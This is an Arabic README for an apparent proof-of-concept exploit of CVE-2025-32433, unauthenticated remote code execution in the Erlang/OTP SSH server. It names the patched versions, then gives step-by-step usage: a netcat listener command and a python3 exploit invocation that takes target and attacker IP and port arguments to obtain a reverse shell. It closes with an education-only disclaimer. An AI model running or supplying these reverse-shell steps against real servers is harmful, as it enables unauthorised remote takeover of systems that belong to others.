
PoC يوضح تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة في خادم SSH الخاص بـ Erlang/OTP. من خلال استغلال ثغرة في معالجة رسائل بروتوكول SSH، يمكن للمهاجم تنفيذ أوامر عشوائية على الهدف دون الحاجة إلى بيانات اعتماد صالحة.
إثبات مفهوم يوضح تنفيذ تعليمات برمجية عن بُعد دون مصادقة في خادم SSH الخاص بـ Erlang/OTP.
من خلال استغلال ثغرة في معالجة رسائل بروتوكول SSH، يمكن للمهاجم تنفيذ أوامر عشوائية على الهدف دون الحاجة إلى بيانات اعتماد صالحة.
تم تصحيح هذه المشكلة في الإصدارات OTP-27.3.3 وOTP-26.2.5.11 وOTP-25.3.2.20.
إعداد المستمع:
nc -lvnp 1234

تشغيل الاستغلال:
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost : عنوان IP الهدف--rport : منفذ SSH الهدف--lhost : عنوان IP الخاص بك للـ reverse shell--lport : منفذ المستمع الخاص بك

هذا المستودع مخصص للأغراض التعليمية فقط. لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. قد يكون سوء الاستخدام غير قانوني وممنوع تمامًا.